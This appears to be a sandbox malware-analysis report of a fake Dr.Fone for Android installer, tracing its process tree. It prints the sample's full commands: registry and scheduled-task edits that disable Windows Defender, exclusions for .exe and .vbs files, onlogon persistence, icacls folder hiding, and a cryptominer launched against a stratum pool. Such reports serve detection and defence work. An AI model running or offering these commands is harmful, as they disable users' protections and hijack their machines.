DrfoneForAndroid.exeDrfoneForAndroid.tmpWScript.exedrfone-for-android_full1544.execmd.exedescription pid process target process PID 744 wrote to memory of 1776 744 DrfoneForAndroid.exe DrfoneForAndroid.tmp PID 744 wrote to memory of 1776 744 DrfoneForAndroid.exe DrfoneForAndroid.tmp PID 744 wrote to memory of 1776 744 DrfoneForAndroid.exe DrfoneForAndroid.tmp PID 1776 wrote to memory of 204 1776 DrfoneForAndroid.tmp WScript.exe PID 1776 wrote to memory of 204 1776 DrfoneForAndroid.tmp WScript.exe PID 1776 wrote to memory of 204 1776 DrfoneForAndroid.tmp WScript.exe PID 1776 wrote to memory of 1452 1776 DrfoneForAndroid.tmp drfone-for-android_full1544.exe PID 1776 wrote to memory of 1452 1776 DrfoneForAndroid.tmp drfone-for-android_full1544.exe PID 1776 wrote to memory of 1452 1776 DrfoneForAndroid.tmp drfone-for-android_full1544.exe PID 204 wrote to memory of 3664 204 WScript.exe cmd.exe PID 204 wrote to memory of 3664 204 WScript.exe cmd.exe PID 204 wrote to memory of 3664 204 WScript.exe cmd.exe PID 1452 wrote to memory of 1908 1452 drfone-for-android_full1544.exe drfone-for-android_full1544.tmp PID 1452 wrote to memory of 1908 1452 drfone-for-android_full1544.exe drfone-for-android_full1544.tmp PID 1452 wrote to memory of 1908 1452 drfone-for-android_full1544.exe drfone-for-android_full1544.tmp PID 3664 wrote to memory of 1004 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1004 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1004 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1040 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1040 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1040 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1552 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1552 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1552 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1784 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1784 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1784 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3784 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3784 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3784 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2600 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2600 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2600 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3756 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3756 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3756 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2032 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2032 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2032 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3892 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3892 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3892 3664 cmd.exe reg.exe PID 3664 wrote to memory of 192 3664 cmd.exe reg.exe PID 3664 wrote to memory of 192 3664 cmd.exe reg.exe PID 3664 wrote to memory of 192 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1780 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1780 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1780 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2216 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2216 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2216 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3896 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3896 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3896 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2744 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2744 3664 cmd.exe reg.exe PID 3664 wrote to memory of 2744 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3760 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3760 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3760 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1704 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1704 3664 cmd.exe reg.exe PID 3664 wrote to memory of 1704 3664 cmd.exe reg.exe PID 3664 wrote to memory of 3688 3664 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\DrfoneForAndroid.exe"C:\Users\Admin\AppData\Local\Temp\DrfoneForAndroid.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:744 -
C:\Users\Admin\AppData\Local\Temp\is-RD29G.tmp\DrfoneForAndroid.tmp"C:\Users\Admin\AppData\Local\Temp\is-RD29G.tmp\DrfoneForAndroid.tmp" /SL5="$2013A,122034549,734208,C:\Users\Admin\AppData\Local\Temp\DrfoneForAndroid.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\ocIiQTVv14pHbbM\iphjManIMEPA.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:204 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ocIiQTVv14pHbbM\mevpxum30dAV.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f5⤵PID:1004
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f5⤵PID:1040
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:1552
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:1784
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵PID:3784
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "0" /f5⤵PID:2600
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:3756
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵PID:2032
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵PID:3892
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵PID:192
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵PID:1780
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵PID:2216
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵PID:3896
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:2744
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f5⤵PID:3760
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵PID:1704
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:3688
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:3608
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:1052
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵PID:4040
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵PID:1520
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵PID:856
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵PID:2316
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵PID:1008
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f5⤵PID:1236
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:2296
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f5⤵PID:3880
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵PID:2196
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵PID:2220
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:2600
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:3756
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:2032
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:3892
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵PID:192
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1780 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".vbs""5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3672 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ocIiQTVv14pHbbM\main.bat" "4⤵PID:3924
-
C:\Windows\SysWOW64\mode.commode 65,105⤵PID:1004
-
C:\ProgramData\ocIiQTVv14pHbbM\7z.exe7z.exe e file.zip -p___________14565pwd7455pwd31616___________ -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1008 -
C:\ProgramData\ocIiQTVv14pHbbM\7z.exe7z.exe e extracted/file_8.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3780 -
C:\ProgramData\ocIiQTVv14pHbbM\7z.exe7z.exe e extracted/file_7.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1816 -
C:\ProgramData\ocIiQTVv14pHbbM\7z.exe7z.exe e extracted/file_6.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2564 -
C:\ProgramData\ocIiQTVv14pHbbM\7z.exe7z.exe e extracted/file_5.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2512 -
C:\ProgramData\ocIiQTVv14pHbbM\7z.exe7z.exe e extracted/file_4.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3892 -
C:\ProgramData\ocIiQTVv14pHbbM\7z.exe7z.exe e extracted/file_3.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3896 -
C:\ProgramData\ocIiQTVv14pHbbM\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3672 -
C:\ProgramData\ocIiQTVv14pHbbM\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4040 -
C:\ProgramData\ocIiQTVv14pHbbM\iexplore.exe"iexplore.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3808 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220 -
C:\Users\Admin\AppData\Local\Temp\nvnodejslauncher.exe"C:\Users\Admin\AppData\Local\Temp\nvnodejslauncher.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
PID:1144 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"8⤵PID:3712
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"9⤵
- Modifies file permissions
PID:932 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"9⤵
- Modifies file permissions
PID:3808 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"9⤵
- Modifies file permissions
PID:3476 -
C:\Users\Admin\AppData\Local\Temp\nbdrivesllapi.exe"C:\Users\Admin\AppData\Local\Temp\nbdrivesllapi.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2216 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "MUIServices" /tr '"C:\Users\Admin\AppData\Local\Temp\MUIServices.exe"' & exit8⤵PID:512
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "MUIServices" /tr '"C:\Users\Admin\AppData\Local\Temp\MUIServices.exe"'9⤵
- Creates scheduled task(s)
PID:2232 -
C:\Users\Admin\AppData\Local\Temp\MUIServices.exe"C:\Users\Admin\AppData\Local\Temp\MUIServices.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3660 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "MUIServices" /tr '"C:\Users\Admin\AppData\Local\Temp\MUIServices.exe"' & exit9⤵PID:1932
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "MUIServices" /tr '"C:\Users\Admin\AppData\Local\Temp\MUIServices.exe"'10⤵
- Creates scheduled task(s)
PID:1328 -
C:\Windows\explorer.exeC:\Windows\explorer.exe --response-timeout=30 --farm-retries=30 --pool stratum://`0xadc1936d485897e6109feafea9fa5a7cf562381d`[email protected]:99999⤵PID:2080
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ocIiQTVv14pHbbM\1x66wvmhfpDEL.bat" "4⤵PID:1052
-
C:\Windows\SysWOW64\timeout.exetimeout /T 120 /NOBREAK5⤵
- Delays execution with timeout.exe
PID:2084 -
C:\Program Files (x86)\drfone-for-android_full1544.exe"C:\Program Files (x86)\drfone-for-android_full1544.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Users\Admin\AppData\Local\Temp\is-3CKI5.tmp\drfone-for-android_full1544.tmp"C:\Users\Admin\AppData\Local\Temp\is-3CKI5.tmp\drfone-for-android_full1544.tmp" /SL5="$20210,102997482,134144,C:\Program Files (x86)\drfone-for-android_full1544.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1908 -
C:\Users\Admin\AppData\Local\Temp\is-RL6L9.tmp\ProcessKiller.exe"C:\Users\Admin\AppData\Local\Temp\is-RL6L9.tmp\ProcessKiller.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956 -
C:\Users\Admin\AppData\Local\Temp\is-RL6L9.tmp\NetFxLite.exe"C:\Users\Admin\AppData\Local\Temp\is-RL6L9.tmp\NetFxLite.exe" /verysilent /NORESTART5⤵
- Executes dropped EXE
PID:2256 -
C:\Users\Admin\AppData\Local\Temp\is-719IB.tmp\NetFxLite.tmp"C:\Users\Admin\AppData\Local\Temp\is-719IB.tmp\NetFxLite.tmp" /SL5="$C0032,9653206,121344,C:\Users\Admin\AppData\Local\Temp\is-RL6L9.tmp\NetFxLite.exe" /verysilent /NORESTART6⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3724 -
C:\Users\Admin\AppData\Local\Temp\is-KOA0V.tmp\NFWCHk.exeC:\Users\Admin\AppData\Local\Temp\is-KOA0V.tmp\NFWCHk.exe7⤵
- Executes dropped EXE
- Modifies system certificate store
PID:4092 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Xml, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" /NoDependencies /nologo7⤵PID:720
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"8⤵PID:1172
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 280 -InterruptEvent 0 -NGENProcess 258 -Pipe 27c -Comment "NGen Worker Process"8⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:2720 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "Accessibility, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo7⤵PID:932
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 16c -Pipe 1dc -Comment "NGen Worker Process"8⤵PID:1552
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 25c -InterruptEvent 0 -NGENProcess 258 -Pipe 260 -Comment "NGen Worker Process"8⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:1008 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Drawing, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo7⤵
- Drops file in Windows directory
PID:972 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"8⤵PID:416
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 0 -NGENProcess 1e8 -Pipe 1d0 -Comment "NGen Worker Process"8⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:1296 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" /NoDependencies /nologo7⤵
- Drops file in Windows directory
PID:668 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"8⤵PID:2512
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 26c -InterruptEvent 0 -NGENProcess 260 -Pipe 264 -Comment "NGen Worker Process"8⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:1552 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo7⤵PID:2732
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d4 -Pipe 1dc -Comment "NGen Worker Process"8⤵PID:1500
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 26c -InterruptEvent 0 -NGENProcess 1e0 -Pipe 1d8 -Comment "NGen Worker Process"8⤵
- Loads dropped DLL
PID:3708 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Security, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo7⤵PID:2208
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e4 -InterruptEvent 0 -NGENProcess 1d4 -Pipe 1e0 -Comment "NGen Worker Process"8⤵PID:1272
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 260 -InterruptEvent 0 -NGENProcess 1ec -Pipe 254 -Comment "NGen Worker Process"8⤵
- Loads dropped DLL
PID:3476 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Data.SqlXml, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" /NoDependencies /nologo7⤵
- Drops file in Windows directory
PID:2388 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 150 -Pipe 1dc -Comment "NGen Worker Process"8⤵PID:3656
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 0 -NGENProcess 2a4 -Pipe 280 -Comment "NGen Worker Process"8⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:3776 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 294 -InterruptEvent 0 -NGENProcess 28c -Pipe 288 -Comment "NGen Worker Process"8⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:1780 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Management, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo7⤵
- Drops file in Windows directory
PID:1764 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"8⤵PID:856
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 258 -InterruptEvent 0 -NGENProcess 26c -Pipe 25c -Comment "NGen Worker Process"8⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:932 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "CustomMarshalers, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo7⤵
- Drops file in Windows directory
PID:496 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"8⤵PID:3348
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 26c -InterruptEvent 0 -NGENProcess 278 -Pipe 264 -Comment "NGen Worker Process"8⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:4092 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.ServiceProcess, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo7⤵
- Drops file in Windows directory
PID:3764 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1c0 -Pipe 1dc -Comment "NGen Worker Process"8⤵PID:2700
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 270 -InterruptEvent 0 -NGENProcess 26c -Pipe 258 -Comment "NGen Worker Process"8⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:2196 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Configuration.Install, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo7⤵
- Drops file in Windows directory
PID:1828 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"8⤵PID:1272
-
